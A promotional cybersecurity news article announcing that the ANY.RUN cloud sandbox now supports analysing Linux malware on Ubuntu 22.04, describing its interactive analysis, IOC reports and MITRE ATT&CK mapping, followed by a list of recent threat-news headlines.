Categories: cyber security

ANY.RUN Sandbox Now Let SOC & DFIR Teams Analyze Sophisticated Linux Malware

The ANY.RUN sandbox has now been updated with support for Linux, further enhancing its ability to provide an isolated and secure environment for malware analysis and threat hunting.

This newly added feature will enable security analysts to investigate and simulate malicious activities in Linux-based systems, allowing for more comprehensive and effective threat detection and response.

ANY.RUN allows malware analysts, SOC members, and DFIR team members to safely examine Linux-based samples and Windows malware in an interactive cloud environment.

A cloud malware sandbox called ANY.RUN performs the difficult malware analysis work for SOC and DFIR teams.

Linux malware analysis is necessary because Linux is a popular target for hackers, and Linux malware is sophisticated.

Many organizations utilize Linux for their IT infrastructure, meaning there are many files to analyze on Linux systems.

Researchers at IBM have noticed an increase in Linux malware. In 2020, the number of malware families related to Linux increased by 40%.

Compromising Linux-based cloud computing platforms could allow attackers access to massive resources, making the OS an appealing target.

Malware Sandboxing Leader ANY.RUN is a cloud malware sandbox that handles the heavy lifting of phishing and malware analysis for SOC and DFIR teams and also helps 300,000 professionals use the platform to investigate incidents and streamline threat analysis.  

Creating A LINUX New Task

You can select Linux from the Operating System drop-down menu when creating a new task.

If you choose it, Ubuntu will run your sample. Ubuntu 22.04.2 will be supported upon launch—all ANY.RUN users, including those on the community plan, can access Linux.

Linux as an option in the Operating system drop-down

The Ubuntu logo is used to identify Linux samples for easy navigation, making it simple to distinguish between Windows and Linux-based tasks in the team’s homepage menu and sidebar quick menu.

Document
Analyse Shopisticated Malware with ANY.RUN

Try ANY.RUN Yourself with a 14-day Free Trial

More than 300,000 analysts use ANY.RUN is a malware analysis sandbox worldwide. Join the community to conduct in-depth investigations into the top threats and collect detailed reports on their behavior..

Enhancing Linux Malware Analysis with ANY.RUN’s

The interactive analysis power of ANY.RUN is now available on Linux for the first time. With Windows samples, ANY.RUN enables analysts of all levels to enhance threat analysis while using fewer resources and delivering quicker training for entry-level analysts and reverse engineers.

The foundation of ANY.RUN is an interactive analysis that enables analysts to identify undetected threats more quickly by changing the analysis’s vector, even in the case of zero-day vulnerabilities. It’s accessible for Linux for the first time.

Process Graph view – clear reports of ANY.RUN

Additionally, it provides real-time alerts to the analyst about suspicious activities, ensuring that no crucial information is ignored. 

Users receive concise reports upon task completion, ensuring analysts can access all relevant data and IOCs for additional investigation or incident response.  

One simple approach to identifying the kind of family or threat you face is quickly aligning suspicious behaviors that the sandbox recorded in a Linux task with TTPs using ANY.RUN’s MITRE Matrix report.

MITTRE ATT&CK Matrix in ANY.RUN

You can learn about 8 ANY.RUN Features you need to know about. 

Benefits of ANY.RUN for Analyzing Linux Malware

Operating systems like Linux are, by nature, more secure than Windows. This indicates that the many malware families that can exploit Linux vulnerabilities are complex and challenging to identify. 

ANY.RUN provides the easiest way to analyze Linux malware, providing information from the analysis in real-time. Analysts immediately understand the results, allowing them to proceed efficiently without context switching. 

Not every security expert has the reverse engineering skill set to swiftly identify the behavior of complex Linux malware and extract the required IOCs. 

To overcome this, ANY.RUN offers real-time information obtained through the analysis. Analysts can move forward effectively and without switching contexts because they immediately grasp the results.

ANY.RUN is a cost-effective solution that lowers business expenses by doing away with custom infrastructure requirements.

Because the Linux virtual machines (VMs) are preconfigured to gather IOCs, customers can avoid weeks of infrastructure setup time related to DevOps.

In addition to being a stand-alone research platform, ANY.RUN can also be utilized in conjunction with SIEM/SOAR.

You can learn more about how to use ANY.RUN here.

Accurate analysis of malware for Linux is necessary for strong security. Because Linux is so widely used, particularly in cloud hosting, attackers find it a desirable target. Breaching Linux-based systems might provide access to a wealth of resources. As a result, Linux users need to be aware of the growing threats to their devices.

Try all features of ANY.RUN at zero cost for 14 days with a free trial.

Cyber Writes

Work done by a Team Of Security Experts from Cyber Writes (www.cyberwrites.com) - World’s First Dedicated Content-as-a-Service (CaaS) Platform for Cybersecurity. For Exclusive Cyber Security Contents, Reach at: business@cyberwrites.com

Recent Posts

New VIPKeyLogger Via Weaponized Office Documenrs Steals Login Credentials

The VIPKeyLogger infostealer, exhibiting similarities to the Snake Keylogger, is actively circulating through phishing campaigns. …

7 hours ago

INTERPOL Urges to End ‘Pig Butchering’ & Replaces With “Romance Baiting”

INTERPOL has called for the term "romance baiting" to replace "pig butchering," a phrase widely…

8 hours ago

New I2PRAT Malware Using encrypted peer-to-peer communication to Evade Detections

Cybersecurity experts are sounding the alarm over a new strain of malware dubbed "I2PRAT," which…

9 hours ago

Earth Koshchei Employs RDP Relay, Rogue RDP server in Server Attacks

 A new cyber campaign by the advanced persistent threat (APT) group Earth Koshchei has brought…

10 hours ago

Careto – A legendary Threat Group Targets Windows By Deploy Microphone Recorder And Steal Files

Recent research has linked a series of cyberattacks to The Mask group, as one notable…

10 hours ago

RiseLoader Attack Windows By Employed A VMProtect To Drop Multiple Malware Families

RiseLoader, a new malware family discovered in October 2024, leverages a custom TCP-based binary protocol…

10 hours ago